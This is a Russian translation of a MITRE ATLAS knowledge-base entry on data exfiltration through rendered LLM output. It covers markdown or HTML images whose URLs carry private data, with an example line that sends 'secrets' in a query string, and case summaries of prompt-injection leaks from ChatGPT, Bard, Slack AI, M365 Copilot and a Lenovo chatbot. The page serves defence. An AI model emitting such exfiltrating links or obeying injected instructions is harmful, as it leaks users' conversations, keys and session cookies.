Рендеринг ответа LLM

Оригинал: LLM Response Rendering

Злоумышленник может добиться того, чтобы большая языковая модель (LLM) вернула приватную информацию, скрытую от пользователя при рендеринге ответа клиентом пользователя. Затем эта приватная информация эксфильтруется. Это может происходить в виде отрендеренных изображений, которые автоматически отправляют запрос на сервер, контролируемый злоумышленником.

Злоумышленник заставляет ИИ показать пользователю изображение, которое клиентское приложение пользователя рендерит без каких-либо действий со стороны пользователя. Изображение размещается на сайте, контролируемом злоумышленником, что позволяет ему эксфильтровать данные через параметры запроса к изображению. Варианты включают HTML-теги и markdown.

Например, LLM может сгенерировать следующий markdown:

![ATLAS](https://atlas.mitre.org/image.png?secrets="private data")

Клиент отрендерит его как:

<img src="https://atlas.mitre.org/image.png?secrets="private data">

Когда запрос поступает на сервер злоумышленника, где размещено запрошенное изображение, злоумышленник получает содержимое параметра запроса secrets.

Тактики

Примеры процедур из кейсов

AML.CS0021Эксфильтрация разговоров ChatGPTАктор: Embrace The Red / Тактика: AML.TA0010 Эксфильтрация

ChatGPT автоматически отображает изображение пользователю, из-за чего отправляет запрос на сервер злоумышленника и передает туда разговор пользователя.

AML.CS0029Эксфильтрация разговоров Google BardАктор: Embrace the Red / Тактика: AML.TA0010 Эксфильтрация

Bard автоматически отображает Markdown-разметку, отправляя запрос к Google Apps Script и тем самым эксфильтруя разговор пользователя. Content Security Policy Bard разрешает такой запрос, потому что URL размещен на домене, принадлежащем Google.

AML.CS0035Эксфильтрация данных из Slack AI через косвенную промпт-инъекциюАктор: PromptArmor / Тактика: AML.TA0010 Эксфильтрация

В соответствии с вредоносными инструкциями ответ отображается как ссылка для перехода, в URL которой закодирован API-ключ жертвы. Фрагмент ответа: Жертву вводят в заблуждение: она думает, что должна нажать на ссылку для повторной аутентификации, после чего ее API-ключ отправляется на сервер под контролем злоумышленника.

AML.CS0059EchoLeak: промпт-инъекция нулевого клика против M365 Copilot для эксфильтрации данныхАктор: Aim Labs / Тактика: AML.TA0010 Эксфильтрация

Copilot отобразил изображение Markdown, URL которого кодировал конфиденциальную информацию. Клиент автоматически попытался загрузить изображение, создав путь эксфильтрации без клика.

AML.CS0060Межсайтовый скриптинг (XSS) через манипуляцию промптом в ИИ-чат-боте LenovoАктор: Cybernews Research Team / Тактика: AML.TA0010 Эксфильтрация

Активный cookie сеанса добавлялся в параметр запроса тега изображения в HTML-нагрузке. Изображение не существовало, однако неудачная загрузка изображения все равно отправляла запрос на сервер, подконтрольный злоумышленнику, эксфильтруя cookie сеанса.